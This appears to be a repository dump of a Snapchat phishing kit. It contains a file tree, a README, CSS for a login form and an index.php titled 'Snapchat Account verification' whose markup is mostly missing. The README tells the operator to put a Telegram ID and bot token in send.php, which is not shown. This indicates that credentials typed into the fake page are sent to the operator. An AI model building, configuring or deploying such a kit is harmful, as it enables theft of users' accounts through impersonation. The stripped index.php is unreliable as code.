├── Pics ├── 1.png ├── 2.png └── 3.png ├── README.md ├── css ├── bootstrap.min.css ├── bootstrap.min.css.map ├── fonts │ └── ar │ │ ├── 1.woff2 │ │ ├── 2.woff2 │ │ ├── 3.woff2 │ │ └── ar-font.css └── style.css ├── images └── snapchat.png ├── index.php ├── js ├── bootstrap.min.js ├── bootstrap.min.js.map ├── index.js └── jquery-3.5.1.min.js └── send.php /Pics/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JUSTSAIF/SNAPCHAT-SPAM/d4a1503110058517137b8c3208d9c06b7f63899e/Pics/1.png -------------------------------------------------------------------------------- /Pics/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JUSTSAIF/SNAPCHAT-SPAM/d4a1503110058517137b8c3208d9c06b7f63899e/Pics/2.png -------------------------------------------------------------------------------- /Pics/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JUSTSAIF/SNAPCHAT-SPAM/d4a1503110058517137b8c3208d9c06b7f63899e/Pics/3.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Mr28 - SNAPCHAT-SPAM - Account verification 2 | [![Open Source Love](https://badges.frapsoft.com/os/v1/open-source.svg?v=103)](https://github.com/ellerbrock/open-source-badges/) 3 | 4 | 5 | 6 | ## Important 7 | Set Your Id and Bot Token for Telegram in [ Send.php ] page . 8 | 9 | 10 | 11 | 12 | Created in 2020/August/14::Friday:: 11:36:07 AM 13 | 14 | 15 | 16 | 17 | - PC 18 | ![program pic](https://github.com/JUSTSAIF/SNAPCHAT-SPAM/blob/main/Pics/1.png?raw=true) 19 | 20 | 21 | 22 | 23 | 24 | 25 | - Done 26 | ![program pic](https://github.com/JUSTSAIF/SNAPCHAT-SPAM/blob/main/Pics/3.png?raw=true) 27 | 28 | 29 | - Mobile 30 | ![program pic](https://github.com/JUSTSAIF/SNAPCHAT-SPAM/blob/main/Pics/2.png?raw=true) 31 | 32 | 33 | 34 | 35 | ## Contact 36 | My Instagarm : [@qq_iq](https://www.instagram.com/qq_iq) Add Me :)🖤 37 | -------------------------------------------------------------------------------- /css/fonts/ar/1.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JUSTSAIF/SNAPCHAT-SPAM/d4a1503110058517137b8c3208d9c06b7f63899e/css/fonts/ar/1.woff2 -------------------------------------------------------------------------------- /css/fonts/ar/2.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JUSTSAIF/SNAPCHAT-SPAM/d4a1503110058517137b8c3208d9c06b7f63899e/css/fonts/ar/2.woff2 -------------------------------------------------------------------------------- /css/fonts/ar/3.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JUSTSAIF/SNAPCHAT-SPAM/d4a1503110058517137b8c3208d9c06b7f63899e/css/fonts/ar/3.woff2 -------------------------------------------------------------------------------- /css/fonts/ar/ar-font.css: -------------------------------------------------------------------------------- 1 | /* arabic */ 2 | @font-face { 3 | font-family: 'Cairo'; 4 | font-style: normal; 5 | font-weight: 600; 6 | font-display: swap; 7 | src: local('Cairo SemiBold'), local('Cairo-SemiBold'), url(1.woff2) format('woff2'); 8 | unicode-range: U+0600-06FF, U+200C-200E, U+2010-2011, U+204F, U+2E41, U+FB50-FDFF, U+FE80-FEFC; 9 | } 10 | /* latin-ext */ 11 | @font-face { 12 | font-family: 'Cairo'; 13 | font-style: normal; 14 | font-weight: 600; 15 | font-display: swap; 16 | src: local('Cairo SemiBold'), local('Cairo-SemiBold'), url(2.woff2) format('woff2'); 17 | unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF; 18 | } 19 | /* latin */ 20 | @font-face { 21 | font-family: 'Cairo'; 22 | font-style: normal; 23 | font-weight: 600; 24 | font-display: swap; 25 | src: local('Cairo SemiBold'), local('Cairo-SemiBold'), url(3.woff2) format('woff2'); 26 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; 27 | } -------------------------------------------------------------------------------- /css/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | /* Real Color : #fffc00 */ 3 | background-color: #fffb00be; 4 | /* direction: rtl; */ 5 | font-family: 'Cairo', sans-serif; 6 | } 7 | 8 | .footer { 9 | left: 0; 10 | bottom: 0; 11 | height: 50px; 12 | background-color: rgba(0, 0, 0, .87); 13 | color: #e5e5e5; 14 | } 15 | 16 | .index-all-page-img { 17 | cursor: pointer; 18 | } 19 | 20 | #pop-login-index { 21 | position: absolute; 22 | background-color: rgba(38, 70, 211, 0.363); 23 | border-radius: 10px; 24 | padding: 10px; 25 | z-index: 9999; 26 | font-size: 20px; 27 | color: rgb(214, 214, 214); 28 | align-items: center; 29 | } 30 | 31 | 32 | /* Login Form */ 33 | 34 | .login-form { 35 | width: 300px; 36 | margin: 30px auto; 37 | } 38 | 39 | .login-form h2 { 40 | font-size: 26px; 41 | font-weight: bold; 42 | margin: 30px 0; 43 | text-align: center; 44 | } 45 | 46 | .login-form form { 47 | color: #fff; 48 | background: #405e9e; 49 | background: radial-gradient(circle, #4d6ba9, #375595); 50 | box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3); 51 | padding: 25px; 52 | margin-bottom: 15px; 53 | } 54 | 55 | .login-form .form-control { 56 | border-color: #dfdfdf; 57 | box-shadow: none !important; 58 | } 59 | 60 | .login-form .form-control, 61 | .login-form .btn { 62 | min-height: 38px; 63 | } 64 | 65 | .login-form input[type="email"] { 66 | border-radius: 2px 2px 0 0; 67 | } 68 | 69 | .login-form input[type="password"] { 70 | border-radius: 0 0 2px 2px; 71 | margin-top: -1px; 72 | } 73 | 74 | .login-form .btn, 75 | .login-form .btn:active { 76 | font-size: 15px; 77 | font-weight: bold; 78 | border-radius: 2px; 79 | background: #eeeeee !important; 80 | color: #646464; 81 | margin-bottom: 25px; 82 | } 83 | 84 | .login-form .btn:hover, 85 | .login-form .btn:focus { 86 | background: #e4e4e4 !important; 87 | } 88 | 89 | .login-form a { 90 | color: #405e9e; 91 | } 92 | 93 | .login-form form a { 94 | color: #fff; 95 | } -------------------------------------------------------------------------------- /images/snapchat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JUSTSAIF/SNAPCHAT-SPAM/d4a1503110058517137b8c3208d9c06b7f63899e/images/snapchat.png -------------------------------------------------------------------------------- /index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Snapchat Account verification 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 41 | 42 | 43 | 44 |
45 |
46 |

Snapchat Account verification

47 |

Account verification

48 |

Account verification

49 | 50 |
51 | 62 |
63 |
64 |





65 |